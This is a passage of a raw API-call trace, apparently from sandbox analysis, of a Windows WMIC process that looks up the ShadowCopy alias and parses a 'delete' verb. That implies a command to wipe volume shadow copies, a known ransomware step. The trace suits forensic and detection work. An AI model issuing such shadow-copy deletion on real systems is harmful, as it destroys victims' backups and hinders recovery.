varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.646] free (_Block=0x88ad18) [0185.646] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0185.646] malloc (_Size=0x16) returned 0x882b20 [0185.646] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0185.646] malloc (_Size=0xc) returned 0x88ace8 [0185.646] IWbemClassObject:Get (in: This=0xa47ae0, wszName="Locale", lFlags=0, pVal=0x69f988*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa30934, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f988*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.646] free (_Block=0x88ace8) [0185.646] lstrlenW (lpString="ms_409") returned 6 [0185.646] malloc (_Size=0xe) returned 0x88ac88 [0185.646] lstrlenW (lpString="ms_409") returned 6 [0185.646] malloc (_Size=0xc) returned 0x88ad18 [0185.646] IWbemClassObject:Get (in: This=0xa47ae0, wszName="User", lFlags=0, pVal=0x69f988*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa30934, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f988*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.646] free (_Block=0x88ad18) [0185.646] malloc (_Size=0xc) returned 0x88acb8 [0185.647] IWbemClassObject:Get (in: This=0xa47ae0, wszName="Password", lFlags=0, pVal=0x69f988*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f988*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.647] free (_Block=0x88acb8) [0185.647] malloc (_Size=0xc) returned 0x88acb8 [0185.647] IWbemClassObject:Get (in: This=0xa47ae0, wszName="Server", lFlags=0, pVal=0x69f988*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f988*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.647] free (_Block=0x88acb8) [0185.647] lstrlenW (lpString=".") returned 1 [0185.647] malloc (_Size=0x4) returned 0x88b5d8 [0185.647] lstrlenW (lpString=".") returned 1 [0185.647] malloc (_Size=0xc) returned 0x88ace8 [0185.647] IWbemClassObject:Get (in: This=0xa47ae0, wszName="Authority", lFlags=0, pVal=0x69f988*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa30934, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f988*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.647] free (_Block=0x88ace8) [0185.647] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.647] IUnknown:Release (This=0xa47ae0) returned 0x1 [0185.647] GetCurrentThreadId () returned 0x1838 [0185.647] ??0CHString@@QAE@XZ () returned 0x69f994 [0185.647] malloc (_Size=0xc) returned 0x88aca0 [0185.647] IWbemClassObject:Get (in: This=0xa47948, wszName="__RELPATH", lFlags=0, pVal=0x69f97c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.648] free (_Block=0x88aca0) [0185.648] malloc (_Size=0xc) returned 0x88ad18 [0185.648] GetCurrentThreadId () returned 0x1838 [0185.648] ??0CHString@@QAE@XZ () returned 0x69f910 [0185.648] ??0CHString@@QAE@PBG@Z () returned 0x69f904 [0185.648] ??0CHString@@QAE@ABV0@@Z () returned 0x69f88c [0185.648] ?Empty@CHString@@QAEXXZ () returned 0x72c565f8 [0185.648] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x88b5e8 [0185.648] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0185.648] ?Left@CHString@@QBE?AV1@H@Z () returned 0x69f884 [0185.648] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x69f888 [0185.648] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x69f904 [0185.648] ??1CHString@@QAE@XZ () returned 0x1 [0185.648] ??1CHString@@QAE@XZ () returned 0x1 [0185.648] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x69f880 [0185.648] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x69f88c [0185.648] ??1CHString@@QAE@XZ () returned 0x1 [0185.648] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x88b650 [0185.648] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0185.648] ?Left@CHString@@QBE?AV1@H@Z () returned 0x69f884 [0185.648] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x69f888 [0185.648] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x69f904 [0185.648] ??1CHString@@QAE@XZ () returned 0x1 [0185.648] ??1CHString@@QAE@XZ () returned 0x1 [0185.648] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x69f880 [0185.648] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x69f88c [0185.648] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.648] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x72c565ec [0185.648] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.648] malloc (_Size=0xc) returned 0x88ad00 [0185.648] malloc (_Size=0xc) returned 0x88ace8 [0185.649] malloc (_Size=0xc) returned 0x88acb8 [0185.649] malloc (_Size=0xc) returned 0x88ac58 [0185.649] malloc (_Size=0xc) returned 0x88ac70 [0185.649] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0185.649] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0185.649] malloc (_Size=0xc) returned 0x88aca0 [0185.649] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0185.649] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0185.649] malloc (_Size=0xc) returned 0x88aa30 [0185.649] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0185.649] SysStringLen (param_1="\"") returned 0x1 [0185.649] free (_Block=0x88aca0) [0185.649] free (_Block=0x88ac70) [0185.649] free (_Block=0x88ac58) [0185.649] free (_Block=0x88acb8) [0185.649] free (_Block=0x88ace8) [0185.649] free (_Block=0x88ad00) [0185.649] IWbemServices:GetObject (in: This=0xa392a8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x69f920*=0x0, ppCallResult=0x0 | out: ppObject=0x69f920*=0xa48040, ppCallResult=0x0) returned 0x0 [0185.657] malloc (_Size=0xc) returned 0x88ace8 [0185.657] IWbemClassObject:Get (in: This=0xa48040, wszName="Text", lFlags=0, pVal=0x69f8e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f8e8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3ab40*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa21b20, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.657] free (_Block=0x88ace8) [0185.658] SafeArrayGetLBound (in: psa=0xa3ab40, nDim=0x1, plLbound=0x69f8fc | out: plLbound=0x69f8fc) returned 0x0 [0185.658] SafeArrayGetUBound (in: psa=0xa3ab40, nDim=0x1, plUbound=0x69f8f8 | out: plUbound=0x69f8f8) returned 0x0 [0185.658] SafeArrayGetElement (in: psa=0xa3ab40, rgIndices=0x69f914, pv=0x69f90c | out: pv=0x69f90c) returned 0x0 [0185.658] malloc (_Size=0xc) returned 0x88ad00 [0185.658] malloc (_Size=0xc) returned 0x88ac70 [0185.658] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0185.658] free (_Block=0x88ad00) [0185.658] IUnknown:Release (This=0xa48040) returned 0x0 [0185.658] free (_Block=0x88aa30) [0185.658] ??1CHString@@QAE@XZ () returned 0x1 [0185.658] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.658] free (_Block=0x88ad18) [0185.658] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.658] lstrlenW (lpString="Shadow copy management.") returned 23 [0185.658] malloc (_Size=0x30) returned 0x88b5e8 [0185.658] lstrlenW (lpString="Shadow copy management.") returned 23 [0185.658] free (_Block=0x88ac70) [0185.658] IUnknown:Release (This=0xa47948) returned 0x0 [0185.658] free (_Block=0x88acd0) [0185.658] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.658] lstrlenW (lpString="PATH") returned 4 [0185.658] lstrlenW (lpString="delet") returned 5 [0185.658] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="PATH", cchCount2=4) returned 1 [0185.659] lstrlenW (lpString="WHERE") returned 5 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 1 [0185.659] lstrlenW (lpString="(") returned 1 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="(", cchCount2=1) returned 3 [0185.659] lstrlenW (lpString="/") returned 1 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="/", cchCount2=1) returned 3 [0185.659] lstrlenW (lpString="-") returned 1 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="-", cchCount2=1) returned 3 [0185.659] malloc (_Size=0xc) returned 0x88ad00 [0185.659] lstrlenW (lpString="GET") returned 3 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="GET", cchCount2=3) returned 1 [0185.659] lstrlenW (lpString="LIST") returned 4 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="LIST", cchCount2=4) returned 1 [0185.659] lstrlenW (lpString="SET") returned 3 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="SET", cchCount2=3) returned 1 [0185.659] lstrlenW (lpString="CREATE") returned 6 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="CREATE", cchCount2=6) returned 3 [0185.659] lstrlenW (lpString="CALL") returned 4 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="CALL", cchCount2=4) returned 3 [0185.659] lstrlenW (lpString="ASSOC") returned 5 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.659] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="ASSOC", cchCount2=5) returned 3 [0185.659] lstrlenW (lpString="DELETE") returned 6 [0185.659] lstrlenW (lpString="delet") returned 5 [0185.660] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delet", cchCount1=5, lpString2="DELETE", cchCount2=6) returned 1 [0185.661] malloc (_Size=0x28) returned 0x88b620 [0185.661] GetCurrentThreadId () returned 0x1838 [0185.661] ??0CHString@@QAE@XZ () returned 0x69d17c [0185.661] malloc (_Size=0xc) returned 0x88acb8 [0185.661] malloc (_Size=0xc) returned 0x88ac70 [0185.661] malloc (_Size=0xc) returned 0x88aca0 [0185.661] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0185.661] malloc (_Size=0x3a) returned 0x88b650 [0185.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe614a8, cbMultiByte=-1, lpWideCharStr=0x88b650, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0185.661] free (_Block=0x88b650) [0185.661] malloc (_Size=0xc) returned 0x88ad18 [0185.661] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0185.661] SysStringLen (param_1="shadowcopy") returned 0xa [0185.661] malloc (_Size=0xc) returned 0x88ace8 [0185.661] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0185.661] SysStringLen (param_1="'") returned 0x1 [0185.662] free (_Block=0x88ad18) [0185.662] free (_Block=0x88aca0) [0185.662] free (_Block=0x88ac70) [0185.662] free (_Block=0x88acb8) [0185.662] IWbemServices:GetObject (in: This=0xa0aeb0, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x69d154*=0x0, ppCallResult=0x0 | out: ppObject=0x69d154*=0xa47bf8, ppCallResult=0x0) returned 0x0 [0185.668] malloc (_Size=0xc) returned 0x88ac58 [0185.668] IWbemClassObject:Get (in: This=0xa47bf8, wszName="Verbs", lFlags=0, pVal=0x69d110*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d110*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3a990*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa21a80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.669] free (_Block=0x88ac58) [0185.669] SafeArrayGetLBound (in: psa=0xa3a990, nDim=0x1, plLbound=0x69d128 | out: plLbound=0x69d128) returned 0x0 [0185.669] SafeArrayGetUBound (in: psa=0xa3a990, nDim=0x1, plUbound=0x69d124 | out: plUbound=0x69d124) returned 0x0 [0185.669] SafeArrayGetElement (in: psa=0xa3a990, rgIndices=0x69d130, pv=0x69d164 | out: pv=0x69d164) returned 0x0 [0185.669] malloc (_Size=0xc) returned 0x88acb8 [0185.669] IWbemClassObject:Get (in: This=0xa3afa8, wszName="Name", lFlags=0, pVal=0x69d100*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d100*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.669] free (_Block=0x88acb8) [0185.669] GetCurrentThreadId () returned 0x1838 [0185.669] ??0CHString@@QAE@XZ () returned 0x69cf8c [0185.669] malloc (_Size=0xc) returned 0x88acb8 [0185.669] IWbemClassObject:Get (in: This=0xa3afa8, wszName="Description", lFlags=0, pVal=0x69cf5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Creates a shadow copy for a volume using a named context. Supported contexts are 'ClientAccessible' and 'NASRollback'. Example: SHADOWCOPY call create 'ClientAccessible', 'd:'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.669] free (_Block=0x88acb8) [0185.669] malloc (_Size=0xc) returned 0x88aca0 [0185.669] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.669] malloc (_Size=0xc) returned 0x88ad18 [0185.669] IWbemClassObject:Get (in: This=0xa3afa8, wszName="Parameters", lFlags=0, pVal=0x69d0f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d0f0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3adb0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa2fce8, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.669] free (_Block=0x88ad18) [0185.669] malloc (_Size=0x38) returned 0x88b650 [0185.669] SafeArrayGetLBound (in: psa=0xa3adb0, nDim=0x1, plLbound=0x69d120 | out: plLbound=0x69d120) returned 0x0 [0185.670] SafeArrayGetUBound (in: psa=0xa3adb0, nDim=0x1, plUbound=0x69d134 | out: plUbound=0x69d134) returned 0x0 [0185.670] SafeArrayGetElement (in: psa=0xa3adb0, rgIndices=0x69d144, pv=0x69d150 | out: pv=0x69d150) returned 0x0 [0185.670] malloc (_Size=0xc) returned 0x88ad18 [0185.670] IWbemClassObject:Get (in: This=0xa49f78, wszName="ParaId", lFlags=0, pVal=0x69d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d090*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Context", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.670] free (_Block=0x88ad18) [0185.670] malloc (_Size=0xc) returned 0x88acb8 [0185.670] IWbemClassObject:Get (in: This=0xa49f78, wszName="Type", lFlags=0, pVal=0x69d048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d048*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.670] free (_Block=0x88acb8) [0185.670] malloc (_Size=0xc) returned 0x88ad18 [0185.670] IWbemClassObject:Get (in: This=0xa49f78, wszName="Default", lFlags=0, pVal=0x69d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d060*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.670] free (_Block=0x88ad18) [0185.670] malloc (_Size=0x24) returned 0x88b690 [0185.670] GetCurrentThreadId () returned 0x1838 [0185.670] ??0CHString@@QAE@XZ () returned 0x69cf9c [0185.670] malloc (_Size=0xc) returned 0x88acb8 [0185.670] IWbemClassObject:Get (in: This=0xa49f78, wszName="Qualifiers", lFlags=0, pVal=0x69cf1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf1c*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3a9f0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa21a50, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.670] free (_Block=0x88acb8) [0185.670] SafeArrayGetLBound (in: psa=0xa3a9f0, nDim=0x1, plLbound=0x69cf54 | out: plLbound=0x69cf54) returned 0x0 [0185.670] SafeArrayGetUBound (in: psa=0xa3a9f0, nDim=0x1, plUbound=0x69cf50 | out: plUbound=0x69cf50) returned 0x0 [0185.670] SafeArrayGetElement (in: psa=0xa3a9f0, rgIndices=0x69cf74, pv=0x69cf94 | out: pv=0x69cf94) returned 0x0 [0185.670] malloc (_Size=0xc) returned 0x88acd0 [0185.670] IWbemClassObject:Get (in: This=0xa4ad28, wszName="Name", lFlags=0, pVal=0x69cf3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf3c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.670] free (_Block=0x88acd0) [0185.671] malloc (_Size=0xc) returned 0x88acd0 [0185.671] IWbemClassObject:Get (in: This=0xa4ad28, wszName="QualifierValue", lFlags=0, pVal=0x69cf2c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf2c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3aa20*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa21ae0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.671] free (_Block=0x88acd0) [0185.671] SafeArrayGetLBound (in: psa=0xa3aa20, nDim=0x1, plLbound=0x69cf4c | out: plLbound=0x69cf4c) returned 0x0 [0185.671] SafeArrayGetUBound (in: psa=0xa3aa20, nDim=0x1, plUbound=0x69cf70 | out: plUbound=0x69cf70) returned 0x0 [0185.671] lstrlenW (lpString="CIMTYPE") returned 7 [0185.671] lstrlenW (lpString="In") returned 2 [0185.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0185.671] lstrlenW (lpString="read") returned 4 [0185.671] lstrlenW (lpString="In") returned 2 [0185.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0185.671] lstrlenW (lpString="write") returned 5 [0185.671] lstrlenW (lpString="In") returned 2 [0185.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0185.671] lstrlenW (lpString="In") returned 2 [0185.671] lstrlenW (lpString="In") returned 2 [0185.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0185.671] SafeArrayGetElement (in: psa=0xa3aa20, rgIndices=0x69cf84, pv=0x69cf88 | out: pv=0x69cf88) returned 0x0 [0185.671] malloc (_Size=0xc) returned 0x88acb8 [0185.671] malloc (_Size=0x4) returned 0x88b6c0 [0185.671] lstrlenW (lpString="true") returned 4 [0185.671] lstrlenW (lpString="True") returned 4 [0185.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0185.671] malloc (_Size=0xc) returned 0x88ac70 [0185.671] malloc (_Size=0x4) returned 0x88b6d0 [0185.671] malloc (_Size=0x24) returned 0x88b6e0 [0185.671] malloc (_Size=0x4) returned 0x88b710 [0185.671] free (_Block=0x88b6d0) [0185.671] IUnknown:Release (This=0xa4ad28) returned 0x1 [0185.671] free (_Block=0x88b6c0) [0185.672] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.672] malloc (_Size=0xc) returned 0x88ad18 [0185.672] malloc (_Size=0xc) returned 0x88acd0 [0185.672] malloc (_Size=0x24) returned 0x88b720 [0185.672] malloc (_Size=0x24) returned 0x88b750 [0185.672] malloc (_Size=0x4) returned 0x88b6c0 [0185.672] malloc (_Size=0x38) returned 0x88b780 [0185.672] malloc (_Size=0x24) returned 0x88b7c0 [0185.672] malloc (_Size=0x24) returned 0x88b7f0 [0185.672] malloc (_Size=0x4) returned 0x88b6d0 [0185.672] free (_Block=0x88b6c0) [0185.672] free (_Block=0x88b750) [0185.672] free (_Block=0x88b720) [0185.672] free (_Block=0x88b710) [0185.672] free (_Block=0x88b6e0) [0185.672] free (_Block=0x88b690) [0185.672] IUnknown:Release (This=0xa49f78) returned 0x1 [0185.672] SafeArrayGetElement (in: psa=0xa3adb0, rgIndices=0x69d144, pv=0x69d150 | out: pv=0x69d150) returned 0x0 [0185.672] malloc (_Size=0xc) returned 0x88ac58 [0185.672] IWbemClassObject:Get (in: This=0xa4a668, wszName="ParaId", lFlags=0, pVal=0x69d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa30b8c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d090*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Volume", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.672] free (_Block=0x88ac58) [0185.672] malloc (_Size=0xc) returned 0x88ac58 [0185.672] IWbemClassObject:Get (in: This=0xa4a668, wszName="Type", lFlags=0, pVal=0x69d048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa307a4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d048*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.672] free (_Block=0x88ac58) [0185.672] malloc (_Size=0xc) returned 0x88ac58 [0185.673] IWbemClassObject:Get (in: This=0xa4a668, wszName="Default", lFlags=0, pVal=0x69d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d060*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.673] free (_Block=0x88ac58) [0185.673] malloc (_Size=0x24) returned 0x88b690 [0185.673] GetCurrentThreadId () returned 0x1838 [0185.673] ??0CHString@@QAE@XZ () returned 0x69cf9c [0185.673] malloc (_Size=0xc) returned 0x88ac58 [0185.673] IWbemClassObject:Get (in: This=0xa4a668, wszName="Qualifiers", lFlags=0, pVal=0x69cf1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf1c*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3ab10*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa21ae0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.673] free (_Block=0x88ac58) [0185.673] SafeArrayGetLBound (in: psa=0xa3ab10, nDim=0x1, plLbound=0x69cf54 | out: plLbound=0x69cf54) returned 0x0 [0185.673] SafeArrayGetUBound (in: psa=0xa3ab10, nDim=0x1, plUbound=0x69cf50 | out: plUbound=0x69cf50) returned 0x0 [0185.673] SafeArrayGetElement (in: psa=0xa3ab10, rgIndices=0x69cf74, pv=0x69cf94 | out: pv=0x69cf94) returned 0x0 [0185.673] malloc (_Size=0xc) returned 0x88ac58 [0185.673] IWbemClassObject:Get (in: This=0xa4ad28, wszName="Name", lFlags=0, pVal=0x69cf3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf3c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.673] free (_Block=0x88ac58) [0185.673] malloc (_Size=0xc) returned 0x88ac58 [0185.673] IWbemClassObject:Get (in: This=0xa4ad28, wszName="QualifierValue", lFlags=0, pVal=0x69cf2c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf2c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3ab40*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa21b90, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.673] free (_Block=0x88ac58) [0185.673] SafeArrayGetLBound (in: psa=0xa3ab40, nDim=0x1, plLbound=0x69cf4c | out: plLbound=0x69cf4c) returned 0x0 [0185.673] SafeArrayGetUBound (in: psa=0xa3ab40, nDim=0x1, 